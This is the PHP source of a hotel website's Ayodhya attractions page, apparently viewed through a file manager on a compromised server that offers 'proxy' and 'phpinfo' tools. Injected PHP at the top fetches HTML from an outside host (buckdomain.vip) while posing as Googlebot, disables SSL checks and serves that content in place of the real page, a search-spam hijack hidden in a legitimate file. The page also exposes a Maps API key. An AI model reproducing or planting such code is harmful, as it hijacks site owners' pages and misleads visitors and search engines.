File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/radhepalace.com/attractions.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ubm4d/www.radhepalace.com-attractions.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="en" data-x="html" data-x-toggle="html-overflow-hidden"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:wght@400;500;600;700&family=Jost:wght@400;500;600;700&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/vendors.css"> <link rel="stylesheet" href="css/main.css"> <title>Attractions - Radhe Palace</title> </head> <body> <?php include 'include/header.php'?> <main> <section data-anim-wrap class="hero -type-6"> <div data-anim-child="img-right cover-light-1 delay-2" class="hero__bg rounded-16"> <img src="img/hero/1/banner.jpg" alt="image" class="img-ratio"> </div> <div class="container"> <div class="row justify-center"> <div class="col-auto"> <div data-split='lines' data-anim="split-lines delay-3" class="pageHero__content text-center"> <h1 class="pageHero__title lh-11 capitalize text-white"> Attractions </h1> </div> </div> </div> </div> </section> <section class="layout-pt-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/1.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> <div class="col-lg-6 col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Shri Ram Janmabhoomi Temple</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">The Shri Ram Janmabhoomi Temple in Ayodhya is a revered Hindu temple believed to be the birthplace of Lord Rama. Inaugurated on January 22, 2024, after a grand consecration ceremony, the temple is constructed in the traditional Nagara architectural style. Designed by architect Chandrakant Sompura and his son Ashish, it features three towering shikharas, with the main one reaching 128 feet, and is adorned with 392 intricately carved pillars and 44 doors, some coated with gold. </p> </div> </div> </div> </section> <section class="layout-pt-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div class="col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Ram Katha Park</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Ramkatha Park in Ayodhya is a beautifully designed public space that celebrates the life and legacy of Lord Rama. The park is dedicated to narrating the stories of Ramayana through sculptures, murals, and informative displays, offering visitors an engaging way to connect with the epic. </p> </div> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/2.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> </div> </div> </section> <section class="layout-pt-lg layout-pb-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/3.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> <div class="col-lg-6 col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Company Garden</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Company Garden in Ayodhya is a charming public garden that offers a peaceful retreat in the heart of the city. Known for its well-maintained lawns, colourful flower beds, and shaded walking paths, the garden is a favourite spot for families, tourists, and locals looking to relax and enjoy nature. </p> </div> </div> </div> </section> <section class="layout-pt-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div class="col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Jain Shrine</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">The Jain Shrine in Ayodhya is an important spiritual site for the Jain community, reflecting the city’s rich religious diversity. Dedicated to Lord Rishabhanatha, the first Tirthankara of Jainism, the shrine is a place of peace, meditation, and devotion. Its simple yet elegant architecture creates a calm environment where devotees can focus on prayer and spiritual reflection. </p> </div> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/4.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> </div> </div> </section> <section class="layout-pt-lg layout-pb-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/5.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> <div class="col-lg-6 col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Shri Maniramdas Chhawni</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Sri Mairam Das Chavani in Ayodhya is a significant religious and historical site that attracts devotees and visitors interested in the spiritual heritage of the city. Named after Mairam Das, the site is associated with the local history and traditions of Ayodhya, offering insight into the city’s cultural and devotional past. </p> </div> </div> </div> </section> <section class="layout-pt-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div class="col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Queen Huh Memorial Park</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Queen Huh Memorial Park in Ayodhya is a beautifully maintained public park that honours the legacy of Queen Huh, a figure remembered for her historical and cultural significance. The park provides a serene environment for visitors to relax, take leisurely walks, and enjoy the natural surroundings. Landscaped gardens, shaded pathways, and open lawns make it an ideal spot for families, tourists, and locals alike. </p> </div> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/6.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> </div> </div> </section> <section class="layout-pt-lg layout-pb-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/7.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> <div class="col-lg-6 col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Ram Ki Paidi</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Ram Ki Paidi in Ayodhya is a renowned ghat along the sacred Sarayu River, holding immense religious and cultural significance. It is a prominent site where devotees gather to perform rituals, take holy dips, and offer prayers to Lord Rama, especially during festivals like Ram Navami and Diwali. </p> </div> </div> </div> </section> <section class="layout-pt-lg"> <div class="container"> <div data-anim-wrap class="row y-gap-30 items-center"> <div class="col-md-6"> <i data-anim-child="slide-up delay-5" class="d-block text-30 mb-30"></i> <h3 data-anim-child="slide-up delay-6" class="text-40 md:text-30 ">Saryu Ghat Ayodhya</h3> <p data-anim-child="slide-up delay-7" class="text-17 lh-17 mt-30">Saryu Ghat in Ayodhya is one of the most prominent and sacred ghats along the holy Saryu River. It holds immense religious significance as devotees come here to perform rituals, take holy dips, and offer prayers to Lord Rama, especially during festivals like Ram Navami and Diwali. </p> </div> <div data-anim-child="img-right cover-light-1 delay-2" class="col-md-6"> <div class="ratio ratio-1:1"> <img src="img/attractions/8.jpg" alt="image" class="img-ratio rounded-16"> </div> </div> </div> </div> </section> <br><br> <?php include 'include/footer.php'?> </main> <!-- JavaScript --> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyAAz77U5XQuEME6TpftaMdX0bBelQxXRlM"></script> <script src="https://unpkg.com/@googlemaps/markerclusterer/dist/index.min.js"></script> <script src="js/vendors.js"></script> <script src="js/main.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings